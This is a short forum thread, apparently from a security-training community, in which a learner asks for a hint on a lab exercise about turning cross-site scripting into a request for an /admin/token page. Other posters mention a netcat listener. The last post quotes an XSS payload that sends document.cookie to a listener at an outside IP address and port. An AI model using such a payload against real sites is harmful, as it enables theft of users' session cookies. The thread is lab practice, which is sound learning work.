Forum Discussion
shubham
Bronze I
10 months ago
Cross-Site Scripting: Ep.6 – Further Exploitation
I was stuck on one question and am looking for a hint. Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.
- 9 months ago
johndoe321
I changed the script to a different port to the one being bombarded and did another NC listener on that different port. Rolled right in.
KieranRowley
Community Manager
10 months ago
Hi shubham, welcome to The Human Connection!
Please can you provide some detail of the steps you have already taken so that your fellow community members are able to assist you?
shubham
Bronze I
10 months ago
Thanks for the welcome.
So I tried using netcat with the payload in the message to make a reverse connection.
Payload: <img src=xss onload="this.src='http://10.102.181.168:5556/admin/token?'+document.cookie;this.removeAttribute('onerror');"/>